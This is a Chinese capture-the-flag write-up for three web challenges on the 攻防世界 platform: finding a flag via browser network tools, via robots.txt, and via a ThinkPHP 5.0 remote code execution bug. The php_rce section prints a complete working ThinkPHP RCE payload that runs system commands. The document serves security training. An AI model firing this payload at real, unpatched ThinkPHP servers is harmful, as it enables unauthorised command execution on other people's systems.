[CTF]攻防世界web高手進階區Writeup(更新ing)

baby_web


EMMMM,這就是一個簽到題~

解題方法:

F12→Networks→刷新抓包→完成

Training-WWW-Robots


 

看題目可以知道這道題考的是爬蟲協議(robots.txt文件)的知識

打開網頁,果然~

他在網頁裏還暗示了一下,Sometimes these files reveal the directory structure instead protecting the content from being crawled.(有時這些文件暴露了目錄結構,而不是保護內容被抓取。)

好吧!我們直接打開robots.txt看看吧

好嘛~ 夠直接的。。。

接下來就沒啥說的,直接訪問fl0g.php這個頁面就可以了

到這裏我們就拿到了這道題的FLAG!

 

推薦相關文章

《關於robots.txt文件的安全問題》

《robots.txt文件問題攻略大全》

 

php_rce


 

打開後,提示使用的thinkphp v5.0版本

然後根據題目提示直接谷歌thinkphp rce漏洞,推薦文章《THINKPHP 5.X RCE 漏洞分析與利用總結

然後直接構造payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

得到FLAG!

 

相關文章推薦:

說說RCE那些事兒

ThinkPHP5 RCE漏洞重現及分析

點進來的小夥伴想學習更多網絡安全知識就請關注我的公衆號吧🤭

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章